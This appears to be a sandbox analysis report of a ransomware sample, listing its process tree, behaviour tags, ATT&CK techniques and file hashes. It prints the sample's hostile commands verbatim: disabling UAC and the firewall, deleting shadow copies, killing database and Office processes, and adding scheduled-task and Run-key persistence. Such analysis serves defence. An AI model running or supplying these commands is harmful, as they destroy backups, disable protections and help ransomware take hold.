- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\t2_svc.bat'" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\t2_svc.bat'" /f3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\nslookup.exenslookup myip.opendns.com. resolver1.opendns.com3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo %date%-%time%2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"2⤵
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo3⤵
- Gathers system information
-
C:\Windows\SysWOW64\find.exefind /i "os name"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c systeminfo|find /i "original"2⤵
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo3⤵
- Gathers system information
-
C:\Windows\SysWOW64\find.exefind /i "original"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes2⤵
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- Modifies registry key
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall set rule group="Network Discovery" new enable=Yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /im notepad.exe&taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im notepad.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im msftesql.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlagent.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlbrowser.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlservr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlwriter.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im oracle.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocssd.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im dbsnmp.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im synctime.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im agntsvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mydesktopqos.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im isqlplussvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im xfssvccon.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mydesktopservice.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocautoupds.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im agntsvc.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im encsvc.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im firefoxconfig.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im tbirdconfig.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocomm.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld-nt.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld-opt.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im dbeng50.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqbcoreservice.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im excel.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im infopath.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im msaccess.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mspub.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im onenote.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im outlook.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im powerpnt.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im steam.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thebat.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thebat64.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thunderbird.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im visio.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im winword.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im wordpad.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f® delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f2⤵
-
C:\Windows\SysWOW64\reg.exereg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f3⤵
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f® add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f3⤵
- Adds Run key to start application
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f3⤵
- Adds Run key to start application
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Read_Me!_.txt1⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ReadMe_Now!.hta"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Bypass User Account Control
1Disabling Security Tools
1Modify Registry
3File Deletion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Read_Me!_.txtMD5
afa801e9f586814b53da66d6196c720f
SHA112f99bbd9511b0019b536a93d06d1bbf08ac61ef
SHA256a051c413afada6b6506e4095ad94a9016ba48b675a2596473dd1dcf57dcbc410
SHA512c220e8ba63eadef8cfa866939a201f6a324452516f97aa084e87db0a2bb676c6f16dea7d9ce799f8cf709858adbbcb14678f0299ad0eaad8e615be204b00637e
-
C:\Users\Admin\AppData\h4_svc.batMD5
ead5cad574fa019df970900e07e76afd
SHA12bf7be0a9b3f174eaccd0a89310699f7b15fed02
SHA2567de41bf6be3b821fb2ff4a2f8b7f6772d407c0bdf1bccfd9c19207ab1f07440f
SHA51216aa662012c6ed8c50cb45f0487ff10081201c0091ccd86b4ae5235e72ef696a188f9acb5f91e8a59b95cac7b5d8b1c89328f32714f51d201db94e0a0aae5c87
-
C:\Users\Admin\AppData\t2_svc.batMD5
702f5dc6f9dec28c8c9b7b6885c9fe09
SHA1dbb85da6de899deb21ce0a8f25c1726cd19e49e8
SHA25620bf5224af318c449407c99e5f4628f71b874463a1cb777031a43b6236ab97e9
SHA512fa4bfc3ac77561585d03bf62e7bb4de0602cf442b5c54b70945f8c75114d111559f50ad36026e2bb1027323f7f50130b7c60bee22835400a8a07feab436ccff7
-
C:\Users\Admin\AppData\v9_svc.vbsMD5
e9c50acda9063b2462697bdbd0a0dfe2
SHA1d1a2bc54905ce0e9121f8e5c249e0527f2190b7e
SHA256f236c75a867944ce27e123b3aaf3a465084bc6135dc453f7f4aacb1cbf9946bd
SHA512d5cd841b82867e323f5cd28f97c9a27ea32be1b3793cb7ddff1ccc3c0559c6b3758f6366d259eda2265431f67a1eebe41dcfb2047ee94c515eb458af6311b8a9
-
memory/796-59-0x000007FEFC0E1000-0x000007FEFC0E3000-memory.dmpFilesize
8KB
-
memory/1604-53-0x0000000075531000-0x0000000075533000-memory.dmpFilesize
8KB